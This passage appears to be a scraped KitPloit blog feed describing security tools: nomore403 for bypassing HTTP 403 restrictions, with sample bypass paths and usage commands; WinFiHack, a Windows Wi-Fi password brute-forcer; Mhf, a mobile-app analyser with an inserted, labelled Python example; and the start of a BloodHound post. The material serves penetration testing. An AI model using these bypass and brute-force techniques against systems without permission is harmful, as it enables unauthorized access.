src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivzZU64br4YS64jYeream1ZEaf6xe7OkTHjUKwdIPkgyWLDpQAHsOQXPWrR5XWPj2Fwqyv0gqMAbj0Dr8iglUt75s6rnIXyvr4lvNpKmoVp4AWQSaJk3HyRBvHhpDdzbiRq-EVBymK2xQqLQB2v8qKDjyMz4Z7QeJv-MrmOWaBgdvjVeOrrdkyw06GCHot/w640-h218/Nomore403.png" width="640"/></a></div><div class="separator" style="clear: both; text-align: center;"><br/></div> <p><code>nomore403</code> is an innovative tool designed to help <a href="https://www.kitploit.com/search/label/Cybersecurity" rel="nofollow" target="_blank" title="cybersecurity">cybersecurity</a> professionals and enthusiasts bypass HTTP 40X errors encountered during 
web security assessments. Unlike other solutions, <code>nomore403</code> automates various <a href="https://www.kitploit.com/search/label/Techniques" rel="nofollow" target="_blank" title="techniques">techniques</a> to seamlessly navigate past these access restrictions, offering a broad range of strategies from header <a href="https://www.kitploit.com/search/label/Manipulation" rel="nofollow" target="_blank" title="manipulation">manipulation</a> to method tampering.</p><span><a name='more'></a></span><div><br/></div><span style="font-size: x-large;"><b>Prerequisites</b></span><br/> <p>Before you install and run <code>nomore403</code>, make sure you have the following:</p> <ul> <li>Go 1.15 or higher installed on your machine.</li> </ul> <br/><span style="font-size: x-large;"><b>Installation</b></span><br/> <br/><span style="font-size: large;"><b>From Releases</b></span><br/> <p>Grab the latest release for your OS from our <a href="https://github.com/devploit/nomore403/releases" rel="nofollow" target="_blank" title="Releases">Releases</a> page.</p> <br/><span style="font-size: large;"><b>Compile from Source</b></span><br/> <p>If you prefer to compile the tool yourself:</p> <pre><code>git clone https://github.com/devploit/nomore403
cd nomore403
go get
go build</code></pre> <br/><span style="font-size: x-large;"><b>Customization</b></span><br/> <p>To edit or add new bypasses, modify the payloads directly in the <a href="https://github.com/devploit/nomore403/tree/main/payloads" rel="nofollow" target="_blank" title="payloads">payloads</a> folder. 
nomore403 will automatically incorporate these changes.</p> <br/><span style="font-size: x-large;"><b>Usage</b></span><br/> <br/><span style="font-size: large;"><b>Output example</b></span><br/> <pre><code>Target: https://domain.com/admin
Headers: false
Proxy: false
User Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; 1ButtonTaskbar)
Method: GET
Payloads folder: payloads
Custom bypass IP: false
Follow Redirects: false
Rate Limit detection: false
Verbose: false

━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━
403 429 bytes https://domain.com/admin

━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━
200 2047 bytes https://domain.com/;///..admin

━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━
403 429 bytes HTTP/1.0
403 429 bytes HTTP/1.1
403 429 bytes HTTP/2

━━━━━━━━━━━━━ CASE SWITCHING ━━━━━━━━━━━━━━
200 2047 bytes https://domain.com/%61dmin</code></pre> <br/><span style="font-size: large;"><b>Basic Usage</b></span><br/> <pre><code>./nomore403 -u https://domain.com/admin</code></pre> <br/><span style="font-size: large;"><b>Verbose Mode + Proxy</b></span><br/> <pre><code>./nomore403 -u https://domain.com/admin -x http://127.0.0.1:8080 -v</code></pre> <br/><span style="font-size: large;"><b>Parse request from Burp</b></span><br/> <pre><code>./nomore403 --request-file request.txt</code></pre> <br/><span style="font-size: large;"><b>Use <a href="https://www.kitploit.com/search/label/Custom%20Header" rel="nofollow" target="_blank" title="custom header">custom header</a> + specific IP address for bypasses</b></span><br/> <pre><code>./nomore403 -u https://domain.com/admin -H "Environment: Staging" -b 8.8.8.8</code></pre> <br/><span 
style="font-size: large;"><b>Set new max of goroutines + add delay between requests</b></span><br/> <pre><code>./nomore403 -u https://domain.com/admin -m 10 -d 200</code></pre> <br/><span style="font-size: x-large;"><b>Options</b></span><br/> <pre><code>./nomore403 -h
Command line application that automates different ways to bypass 40X codes.

Usage:
  nomore403 [flags]

Flags:
  -i, --bypass-ip string     Use a specified IP address or hostname for bypassing access controls. Injects this IP in headers like 'X-Forwarded-For'.
  -d, --delay int            Specify a delay between requests in milliseconds. Helps manage request rate (default: 0ms).
  -f, --folder string        Specify the folder location for payloads if not in the same directory as the executable.
  -H, --header strings       Add one or more custom headers to requests. Repeatable flag for multiple headers.
  -h, --help                 help for nomore403
      --http                 Use HTTP instead of HTTPS for requests defined in the request file.
  -t, --http-method string   Specify the HTTP method for the request (e.g., GET, POST). Default is 'GET'.
  -m, --max-goroutines int   Limit the maximum number of concurrent goroutines to manage load (default: 50). (default 50)
      --no-banner            Disable the display of the startup banner (default: banner shown).
  -x, --proxy string         Specify a proxy server for requests, e.g., 'http://server:port'.
      --random-agent         Enable the use of a randomly selected User-Agent.
  -l, --rate-limit           Halt requests upon encountering a 429 (rate limit) HTTP status code.
  -r, --redirect             Automatically follow redirects in responses.
      --request-file string  Load request configuration and flags from a specified file.
  -u, --uri string           Specify the target URL for the request.
  -a, --user-agent string    pecify a custom User-Agent string for requests (default: 'nomore403').
  -v, --verbose              Enable verbose output for detailed request/response logging.</code></pre> <br/><span style="font-size: x-large;"><b>Contributing</b></span><br/> <p>We welcome contributions of all forms. 
Here's how you can help:</p> <ul> <li>Report bugs and suggest features.</li> <li>Submit pull requests with bug fixes and new features.</li> </ul> <br/><span style="font-size: x-large;"><b>Security Considerations</b></span><br/> <p>While nomore403 is designed for educational and ethical testing purposes, it's important to use it responsibly and with permission on target systems. Please adhere to local laws and guidelines.</p> <br/><span style="font-size: x-large;"><b>License</b></span><br/> <p>nomore403 is released under the MIT License. See the <a href="https://github.com/devploit/dontgo403/blob/main/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a> file for details.</p> <br/><span style="font-size: x-large;"><b>Contact</b></span><br/> <p><a href="https://twitter.com/devploit/" rel="nofollow" target="_blank" title="Tool to bypass 403/40X response codes. (10)"><img alt="Tool to bypass 403/40X response codes. (3)" src="https://img.shields.io/badge/-Twitter-blue?style=flat-square&logo=Twitter&logoColor=white&link=https://twitter.com/devploit/"/></a></p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/devploit/nomore403" rel="nofollow" target="_blank" title="Download Nomore403">Download Nomore403</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/nomore403-tool-to-bypass-40340x.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-8328061043885335052024-03-11T09:23:00.001-07:002024-03-11T09:23:06.845-07:00WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies<div class="post-body entry-content" id="post-body-4393216522276329586" itemprop="articleBody"> <div style="margin:15px"> </div> <p style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi" rel="nofollow"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640"/></a></p> <p>WinFiHack is a recreational attempt by me to rewrite my previous project <a href="https://github.com/morpheuslord/Brute-Hacking-Framework-SourceCode" rel="nofollow" target="_blank" title="Brute-Hacking-Framework's">Brute-Hacking-Framework's</a> main wifi <a href="https://www.kitploit.com/search/label/Hacking" rel="nofollow" target="_blank" title="hacking">hacking</a> script that uses netsh and native <a href="https://www.kitploit.com/search/label/Windows" rel="nofollow" target="_blank" title="Windows">Windows</a> <a href="https://www.kitploit.com/search/label/Scripts" rel="nofollow" target="_blank" title="scripts">scripts</a> to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack, but it needs no external libraries, just Python and Python scripts.</p> <span><a name='more'></a></span><div><br/></div><span style="font-size: large;"><b>Installation</b></span><br/> <p>The packages are minimal or nearly none 😅. 
The package install command is:</p> <pre><code>pip install rich pyfiglet</code></pre> <p>That's it.</p> <br/><span style="font-size: large;"><b>Features</b></span><br/> <p>So listing the features:</p> <ul> <li><em>Overall Features:</em> <ul> <li>We can use custom interfaces or non-default interfaces to run the attack.</li> <li>Well-defined way of using netsh and listing and utilizing targets.</li> <li>Upgradeability.</li> </ul> </li> <li><em>Code-Wise Features:</em> <ul> <li>Interactive menu-driven system with <code>rich</code>.</li> <li>Versatility in using interface, targets, and password files.</li> </ul> </li> </ul> <br/><span style="font-size: large;"><b>How it works</b></span><br/> <p>So this is how the <a href="https://www.kitploit.com/search/label/Bruteforcer" rel="nofollow" target="_blank" title="bruteforcer">bruteforcer</a> works:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/s1294/WinFiHack.png" imageanchor="1" rel="nofollow" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="685" data-original-width="1294" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/w640-h338/WinFiHack.png" width="640"/></a></div> <ul> <li> <p><em>Provide Interface:</em></p> </li> <li> <p>The user is required to provide the network interface for the tool to use.</p> </li> <li> <p>By default, the interface is set to <code>Wi-Fi</code>.</p> </li> <li> <p><em>Search and Set Target:</em></p> </li> <li> <p>The user must search for and select the target network.</p> </li> <li> <p>During this 
process, the tool performs the following sub-steps:</p> <ul> <li>Disconnects all active network connections for the selected interface.</li> <li>Searches for all available networks within range.</li> </ul> </li> <li> <p><em>Input Password File:</em></p> </li> <li> <p>The user inputs the path to the password file.</p> </li> <li> <p>The default path for the password file is <code>./wordlist/default.txt</code>.</p> </li> <li> <p><em>Run the Attack:</em></p> </li> <li> <p>With the target set and the password file ready, the tool is now prepared to initiate the attack.</p> </li> <li> <p><em>Attack Procedure:</em></p> </li> <li>The attack involves iterating through each password in the provided file.</li> <li>For each password, the following steps are taken:<ul> <li>A custom XML configuration for the connection attempt is generated and stored.</li> <li>The tool attempts to connect to the target network using the generated XML and the current password.</li> <li>To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.</li> <li>If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.</li> <li>This loop continues until a successful ping response is received, indicating a successful connection attempt.</li> </ul> </li> </ul> <br/><span style="font-size: large;"><b>How to run this</b></span><br/> <p style="text-align: left;">After installing all the packages, just run <code>python main.py</code>; the rest is <a href="https://www.kitploit.com/search/label/History" rel="nofollow" target="_blank" title="history">history</a> 👍. Make sure you run this on Windows, because this won't work on any other OS. 
The interface looks like this:</p><p style="text-align: center;">  <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi" rel="nofollow"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640"/></a></p> <br/><span style="font-size: large;"><b>Contributions</b></span><br/> <p>For contributions:</p> <ul> <li><em>First Clone:</em> First clone the repo into your dev env and do the edits.</li> <li><em>Comments:</em> I would appreciate it if you could add comments explaining your POV and also explaining the upgrade.</li> <li><em>Submit:</em> Submit a PR for me to verify the changes and approve it if necessary.</li> </ul><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/morpheuslord/WinFiHack" rel="nofollow" target="_blank" title="Download WinFiHack">Download WinFiHack</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/winfihack-windows-wifi-brute-forcing.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-76029654779433764442024-03-09T14:37:00.001-08:002024-03-09T14:37:15.805-08:00Mhf - Mobile Helper Framework - A Tool That Automates The Process Of Identifying The Framework/Technology Used To Create A Mobile Application<div class="post-body entry-content" id="post-body-812676710718154663" itemprop="articleBody"> <div style="margin:15px"> </div> <div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir81ZSiKQIrBc66e-q1MVjO3J9eD2s6sNYbprAhq-JDsVfFBcBKV1WltNnAc5jsGrgM1N17jJbS6IoEokK2KXq-ghPNJujzE4Bji-XgP9rYE6t1Pf_-TevCaKgKeT8cTbKWx0ckyJU2oG4wmGsSbSHpvXodazhdoI84Fkarqu14cohvLVKkmRZ8JhWxUMq/s1773/Mhf.png" imageanchor="1" rel="nofollow" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1014" data-original-width="1773" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir81ZSiKQIrBc66e-q1MVjO3J9eD2s6sNYbprAhq-JDsVfFBcBKV1WltNnAc5jsGrgM1N17jJbS6IoEokK2KXq-ghPNJujzE4Bji-XgP9rYE6t1Pf_-TevCaKgKeT8cTbKWx0ckyJU2oG4wmGsSbSHpvXodazhdoI84Fkarqu14cohvLVKkmRZ8JhWxUMq/w640-h366/Mhf.png" width="640"/></a></div><p><br/></p><p>Mobile Helper Framework is a tool that automates the process of identifying the framework/technology used to create a mobile application. Additionally, it assists in finding <a href="https://www.kitploit.com/search/label/Sensitive%20Information" rel="nofollow" target="_blank" title="sensitive information">sensitive information</a> or provides suggestions for working with the identified platform.</p><span><a name='more'></a></span><p><br/></p><span style="font-size: large;"><b>How does it work?</b></span><br/> <p>The tool searches for files associated with the technologies used in mobile application development, such as configuration files, resource files, and source code files.</p> <br/><span style="font-size: large;"><b>Example</b></span><br/> <br/><b>Cordova</b><br/> <p>Search files:</p> <pre><code>index.html
cordova.js
cordova_plugins.js</code></pre> <br/><b>React Native Android & iOS</b><br/> <p>Search files:</p> <pre><code>Android files:
libreactnativejni.so
index.android.bundle

iOS files:
main.jsbundle</code></pre> <br/><span style="font-size: large;"><b>Installation</b></span><br/> <p>❗A minimum of Java 8 is required to run Apktool. 
</p> <p><code>pip install -r requirements.txt</code></p> <br/><span style="font-size: large;"><b>Usage</b></span><br/> <p><code>python3 mhf.py app.apk|ipa|aab</code></p> <br/><b>Examples</b><br/> <pre><code>python3 mobile_helper_framework.py file.apk
[+] App was written in React Native
Do you want analizy the application (y/n) y
Output directory already exists. Skipping decompilation.
Beauty the react code? (y/n) n
Search any info? (y/n) y
==>>Searching possible internal IPs in the file
results.........
==>>Searching possible emails in the file
results.........
==>>Searching possible interesting words in the file
results.........
==>>Searching Private Keys in the file
results.........
==>>Searching high confidential secrets
results.........
==>>Searching possible sensitive URLs in js files
results.........
==>>Searching possible endpoints in js files
results.........</code></pre> <br/><span style="font-size: large;"><b>Features</b></span><br/> <p>This tool uses Apktool for decompilation of Android applications.</p> <p>This tool renames the .ipa file of iOS applications to .zip and extracts the contents. 
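</p>

<p>A file-name fingerprint of the kind the "How does it work?" and "Example" sections describe, written here as an added example rather than taken from Mhf's own code: it lists the members of an APK or IPA (both are zip containers), matches them against the Cordova, React Native and Flutter file names given on this page, checks whether the JS bundle is plain text, and parses <code>adb shell pm path</code> output for the split-APK case. The two sample packages are constructed in memory; the <code>pm path</code> output is the one shown on this page.</p>

```python
"""Added example (not Mhf's own code): file-name fingerprinting of a
mobile app package and the split-APK check, as described on this page."""
import io
import zipfile
from typing import Dict, List, Optional, Tuple

# Signatures taken from the page's Example section (Cordova, React
# Native Android/iOS) plus libflutter.so from the Split APKs note.
# index.html is listed for Cordova too, but any WebView app ships one,
# so it is not used as evidence on its own.
SIGNATURES: Dict[str, Tuple[str, ...]] = {
    "Cordova": ("cordova.js", "cordova_plugins.js"),
    "React Native (Android)": ("libreactnativejni.so", "index.android.bundle"),
    "React Native (iOS)": ("main.jsbundle",),
    "Flutter": ("libflutter.so",),
}


def list_members(package: bytes) -> List[str]:
    """Member names of an .apk/.aab/.ipa; all three are zip containers,
    which is why the page renames .ipa to .zip before extracting."""
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        return zf.namelist()


def identify_framework(members: List[str]) -> List[Tuple[str, List[str]]]:
    """Match each member's basename against SIGNATURES and return the
    frameworks with at least one hit, strongest evidence first."""
    basenames = {m.rsplit("/", 1)[-1] for m in members}
    hits = [(fw, [s for s in sigs if s in basenames]) for fw, sigs in SIGNATURES.items()]
    return sorted([h for h in hits if h[1]], key=lambda h: -len(h[1]))


def bundle_is_plain_js(package: bytes, basename: str) -> Optional[bool]:
    """None if no such member; True if the bundle is readable UTF-8 text
    (so beautifying and secret searching apply); False if it is not
    (bytecode such as Hermes, or encrypted). A heuristic, not a parser."""
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for m in zf.namelist():
            if m.rsplit("/", 1)[-1] == basename:
                blob = zf.read(m)
                break
        else:
            return None
    try:
        blob.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return b"\x00" not in blob


def parse_pm_path(output: str) -> List[str]:
    """Paths from `adb shell pm path <package>`, one 'package:<path>' per line."""
    return [line.split(":", 1)[1].strip()
            for line in output.splitlines() if line.startswith("package:")]


def split_apk_report(paths: List[str]) -> Dict[str, object]:
    """Whether the install is split, and which split carries the arm64
    native libraries (for Flutter, the one holding libflutter.so)."""
    splits = [p for p in paths if "/split_config." in p]
    arm64 = [p for p in splits if p.endswith("split_config.arm64_v8a.apk")]
    return {"split": bool(splits), "splits": splits,
            "arm64_split": arm64[0] if arm64 else None}


def build_sample_package(members: Dict[str, bytes]) -> bytes:
    """Constructed in-memory zip standing in for a real APK (sample data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed samples: a React Native APK whose bundle is not plain text,
# and a Cordova APK with readable JS.
RN_SAMPLE = build_sample_package({
    "AndroidManifest.xml": b"<binary manifest placeholder>",
    "lib/arm64-v8a/libreactnativejni.so": b"\x7fELF placeholder",
    "assets/index.android.bundle": b"\xc6\x1f\xbc\x03\x00\x00 not plain JS",
})
CORDOVA_SAMPLE = build_sample_package({
    "assets/www/index.html": b"<html></html>",
    "assets/www/cordova.js": b"var cordova = {};",
    "assets/www/cordova_plugins.js": b"module.exports = [];",
})
# The `pm path` output shown on this page.
PM_PATH_OUTPUT = """package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/base.apk
package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.arm64_v8a.apk
package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.en.apk
package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.xxhdpi.apk
"""

if __name__ == "__main__":
    for label, pkg in (("RN", RN_SAMPLE), ("Cordova", CORDOVA_SAMPLE)):
        print(label, identify_framework(list_members(pkg)))
    print(bundle_is_plain_js(RN_SAMPLE, "index.android.bundle"))
    print(split_apk_report(parse_pm_path(PM_PATH_OUTPUT)))
```

<p>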
</p> <table> <tbody><tr> <th align="center">Feature</th> <th>Note</th> <th align="right">Cordova</th> <th align="right">React Native</th> <th align="right">Native JavaScript</th> <th align="right">Flutter</th> <th align="right">Xamarin</th> </tr> <tr> <td align="center">JavaScript beautifier</td> <td>Use this for the first few occasions to see better results.</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Identifying multiple sensitive information</td> <td>IPs, Private Keys, API Keys, Emails, URLs</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">❌</td> <td align="right"></td> </tr> <tr> <td align="center">Cryptographic Functions</td> <td></td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">❌</td> <td align="right">❌</td> </tr> <tr> <td align="center">Endpoint extractor</td> <td></td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">❌</td> <td align="right">❌</td> </tr> <tr> <td align="center">Automatically detects if the code has been beautified.</td> <td></td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Extracts automatically apk of devices/emulator</td> <td></td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> </tr> <tr> <td align="center">Patching apk</td> <td></td> <td align="right"></td> <td align="right"></td> <td align="right"></td> <td align="right">✅</td> <td align="right"></td> </tr> <tr> <td align="center">Extract an APK from a bundle file.</td> <td></td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> </tr> <tr> <td align="center">Detect if JS files 
are encrypted</td> <td></td> <td align="right">❌</td> <td align="right"></td> <td align="right">❌</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Detect if the resources are compressed.</td> <td></td> <td align="right">❌</td> <td align="right">Hermes✅</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">XALZ✅</td> </tr> <tr> <td align="center">Detect if the app is split</td> <td></td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> </tr> </tbody></table> <p><code>What is patching apk:</code> This tool uses Reflutter, a framework that assists with <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" rel="nofollow" target="_blank" title="reverse engineering">reverse engineering</a> of Flutter apps using a patched version of the Flutter library.</p> <p>More information: https://github.com/Impact-I/reFlutter </p><hr/> <p><code>Split APKs</code> is a technique used by Android to reduce the size of an application and allow users to download and use only the necessary parts of the application.</p> <p>Instead of downloading a complete application in a single APK file, Split APKs divide the application into several smaller APK files, each of which contains only a part of the application such as resources, code libraries, assets, and configuration files.</p> <pre><code>adb shell pm path com.package
package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/base.apk
package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.arm64_v8a.apk
package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.en.apk
package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.xxhdpi.apk</code></pre> <p>For example, if a Flutter application is split, it is split_config.arm64_v8a.apk that needs to be patched, since that file contains libflutter.so. </p> <br/><span style="font-size: large;"><b>Credits</b></span><br/> <ul> <li>This tool uses 
a secrets-patterns-db repository created by <a href="https://github.com/mazen160/secrets-patterns-db" rel="nofollow" target="_blank" title="mazen160">mazen160</a></li> <li>This tool uses a regular expression created by <a href="https://github.com/GerbenJavado/LinkFinder/blob/master/linkfinder.py" rel="nofollow" target="_blank" title="Gerben_Javado">Gerben_Javado</a> to extract endpoints</li> <li>This tool uses <a href="https://www.kitploit.com/search/label/reFlutter" rel="nofollow" target="_blank" title="reflutter">reflutter</a> for Flutter actions </li> </ul> <br/><span style="font-size: large;"><b>Changelog</b></span><br/> <br/><b>0.5</b><br/> <ul> <li>Public release</li> <li>Bug fixes</li> </ul> <br/><b>0.4</b><br/> <ul> <li>Added plugins information in Cordova apps</li> <li>Added Xamarin actions</li> <li>Added NativeScript actions</li> <li>Bug fixes</li> </ul> <br/><b>0.3</b><br/> <ul> <li>Added NativeScript app detection</li> <li>Added signing option for when the APK extracted from an AAB file is not signed</li> </ul> <br/><b>0.2</b><br/> <ul> <li>Fixed issues with commands on Linux.</li> </ul> <br/><b>0.1</b><br/> <ul> <li>Initial version release.</li> </ul> <br/><span style="font-size: large;"><b>License</b></span><br/> <ul> <li>This work is licensed under a Creative Commons Attribution 4.0 International License.</li> </ul> <br/><span style="font-size: large;"><b>Authors</b></span><br/> <p><a href="https://twitter.com/__stux" rel="nofollow" target="_blank" title="Cesar Calderon">Cesar Calderon</a> <a href="https://websec.mx/" rel="nofollow" target="_blank" title="Marco Almaguer">Marco Almaguer</a></p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/stuxctf/mhf" rel="nofollow" target="_blank" title="Download Mhf">Download Mhf</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/mhf-mobile-helper-framework-tool-that.html" 
rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-36560992193084702332024-03-08T09:18:00.001-08:002024-03-08T09:18:56.821-08:00BloodHound - Six Degrees Of Domain Admin<div class="post-body entry-content" id="post-body-7786188654903730893" itemprop="articleBody"> <div style="margin:15px"> </div> <p></p><p></p><p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjapo5OJmW2ZGdWH6Fut4H-kEifhE9oTnwxqfSjRz7zjVuMwhsOoOJtuqRNmn_cVxcziFJsoEiw8UbrJt-R1bNNx5-jEm4o1ztvvjF5PkfacD2uURmR-mf5o65gM0tkNdvi9aDO72eBJve4nuG-TDUeUWjXCLMC7VWMz8wQTUeUoW0pK3x3F_8YCPpfuzio" rel="nofollow"><img alt="" border="0" height="548" id="BLOGGER_PHOTO_ID_7338668270705967650" src="https://blogger.googleusercontent.com/img/a/AVvXsEjapo5OJmW2ZGdWH6Fut4H-kEifhE9oTnwxqfSjRz7zjVuMwhsOoOJtuqRNmn_cVxcziFJsoEiw8UbrJt-R1bNNx5-jEm4o1ztvvjF5PkfacD2uURmR-mf5o65gM0tkNdvi9aDO72eBJve4nuG-TDUeUWjXCLMC7VWMz8wQTUeUoW0pK3x3F_8YCPpfuzio=w640-h548" width="640"/></a></p><p align="center"><br/></p> <p>BloodHound is a monolithic web application composed of an embedded React frontend with <a href="https://www.sigmajs.org/" rel="nofollow" target="_blank" title="Sigma.js">Sigma.js</a> and a <a href="https://go.dev/" rel="nofollow" target="_blank" title="Go">Go</a> based REST API backend. 
It is deployed with a <a href="https://www.postgresql.org/" rel="nofollow" target="_blank" title="Postgresql">Postgresql</a> application database and a <a href="https://neo4j.com/" rel="nofollow" target="_blank" title="Neo4j">Neo4j</a> graph database, and is fed by the <a href="https://github.com/BloodHoundAD/SharpHound" rel="nofollow" target="_blank" title="SharpHound">SharpHound</a> and <a href="https://github.com/BloodHoundAD/AzureHound" rel="nofollow" target="_blank" title="AzureHound">AzureHound</a> data collectors.</p> <p>BloodHound uses <a href="https://www.kitploit.com/search/label/Graph%20Theory" rel="nofollow" target="_blank" title="graph theory">graph theory</a> to reveal the hidden and often unintended relationships within an <a href="https://www.kitploit.com/search/label/Active%20Directory" rel="nofollow" target="_blank" title="Active Directory">Active Directory</a> or Azure environment. Attackers can use <a href="https://www.kitploit.com/search/label/BloodHound" rel="nofollow" target="_blank" title="BloodHound">BloodHound</a> to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.</p> <p>BloodHound CE is created and maintained by the <a href="https://bloodhoundenterprise.io" rel="nofollow" target="_blank" title="BloodHound Enterprise Team">BloodHound Enterprise Team</a>. 
